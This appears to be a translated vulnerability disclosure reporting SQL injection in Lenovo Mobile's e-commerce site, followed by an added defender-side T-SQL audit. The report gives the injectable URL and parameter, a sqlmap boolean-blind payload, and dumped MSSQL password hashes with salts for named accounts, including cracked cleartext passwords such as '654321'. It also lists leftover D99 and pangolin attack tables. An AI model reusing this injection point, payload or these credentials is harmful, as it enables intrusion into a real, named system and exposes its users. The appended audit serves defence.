1. This site, the Lenovo Mobile e-commerce system, looks impressive:
http://ec.lenovomobile.com/
2. SQL injection is possible here:
http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx?List_Name=Lenovo Mobile Cooperative Bank
3. And it is running as SA:
4. Cross-database access is possible:
5. Multiple database accounts have weak passwords:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: List_Name
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: List_Name=Lenovo Mobile Cooperative Bank' AND 6011=6011 AND 'hhoo'='hhoo
---
Database management system users password hashes:
[*] Sa [1]:
Password hash: Encrypted
Header: 0x0100
Salt: b0675249
Mixedcase: 76ec63baa2ca005f95417ee92c62e5dc0d2a2707
Uppercase: 2c2812de9a617e1108f39c388b5252c274bebe9e
[*] Shenjx [1]:
Password hash: Encrypted
Header: 0x0100
Salt: 3e74822b
Mixedcase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
Uppercase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
Clear-text password: 654321
[*] Swwl [1]:
Password hash: Encrypted
Header: 0x0100
Salt: b575e507
Mixedcase: b98bcb343331377b5ba7a26a09e83a51821c2f96
Uppercase: fa0950ee393ffbb1980d997bce410845398f0219
Clear-text password: swwl
[*] Wends [1]:
Password hash: Encrypted
Header: 0x0100
Salt: 1a76751d
Mixedcase: f147fd28495401d6f84e98be0ba48bb05226b4e1
Uppercase: e046486691b981689f41de885727f169f0850578
Clear-text password: wends
6. Looking at the tables of the current database "LMECOTHER": someone has been here before and left behind the temporary tables of D99 and pangolin:
Database: LMECOTHER
[38 tables]
+--------------------------------------------------+
| dbo.D99_CMD |
| dbo.D99_Tmp |
| dbo.Other_Address_List |
| dbo.Other_Address_Org |
| dbo.Other_BBS_Forum |
| dbo.Other_BBS_ForumGroups |
| dbo.Other_BBS_Posts |
| dbo.Other_BBS_RePosts |
| dbo.Other_BBS_Users |
| dbo.Other_ClickStat |
| dbo.Other_CusLine |
| dbo.Other_CusLine_Type |
| dbo.Other_DownLoad_KnowLedge_Type |
| dbo.Other_DownLoad_List |
| dbo.Other_DownLoad_List_Type |
| dbo.Other_DownLoad_Pic |
| dbo.Other_DownLoad_Tools |
| dbo.Other_DownLoad_knowledge |
| dbo.Other_Link |
| dbo.Other_Rule |
| dbo.Other_Survey |
| dbo.Other_Survey_Item |
| dbo.Other_Survey_Result |
| dbo.View_Forum |
| dbo.View_PostList |
| dbo.dtproperties |
| dbo.kill_kk |
| dbo.other_CustMailInfo |
| dbo.other_CustMailView |
| dbo.other_Notice |
| dbo.other_Notice_New |
| dbo.other_Notification |
| dbo.other_NotificationObj |
| dbo.other_icationicationobj_new |
| dbo.other_icationication_new |
| dbo.pangolin_test_table |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
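A DBA-side audit for findings 3, 5 and 6 above, added here as an example and not part of the original report. It assumes SQL Server 2008 or later and a login allowed to read sys.sql_logins; the short weak-password list is constructed for illustration and should be extended.

```sql
-- Added example: defender-side audit, run by the DBA on the affected instance.
-- Assumption: SQL Server 2008 or later (sys.sql_logins, multi-row VALUES).

-- Finding 3: does the login used by the web application have SA-level rights?
-- Run this while connected with the application's own connection string.
SELECT SUSER_SNAME()                AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;  -- 1 means sysadmin

-- Finding 5: SQL logins whose password equals the login name, is blank,
-- or appears on a short list of trivial values (constructed list).
DECLARE @weak TABLE (pw nvarchar(128));
INSERT INTO @weak (pw)
VALUES (N''), (N'123456'), (N'654321'), (N'password'), (N'sa');

SELECT l.name,
       l.is_disabled,
       CASE WHEN PWDCOMPARE(l.name, l.password_hash) = 1
            THEN 'password equals login name'
            ELSE 'password on weak list'
       END AS finding
FROM sys.sql_logins AS l
WHERE PWDCOMPARE(l.name, l.password_hash) = 1
   OR EXISTS (SELECT 1
              FROM @weak AS w
              WHERE PWDCOMPARE(w.pw, l.password_hash) = 1);

-- Finding 6: tables in the current database named like the D99 and pangolin
-- leftovers in the listing above. create_date gives a starting point for the
-- incident timeline. [_] makes the underscore literal instead of a wildcard.
SELECT SCHEMA_NAME(t.schema_id) AS schema_name,
       t.name                   AS table_name,
       t.create_date
FROM sys.tables AS t
WHERE t.name LIKE 'D99[_]%'
   OR t.name LIKE 'pangolin[_]%'
ORDER BY t.create_date;
```

Any row from the last query means the database has already been worked on with injection tooling, so the logins flagged by the second query should be treated as exposed and rotated rather than only strengthened.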
Solution: send gifts. What else can I do!
Copyright statement: when reprinting, please indicate the source: Feng Xiaoxiao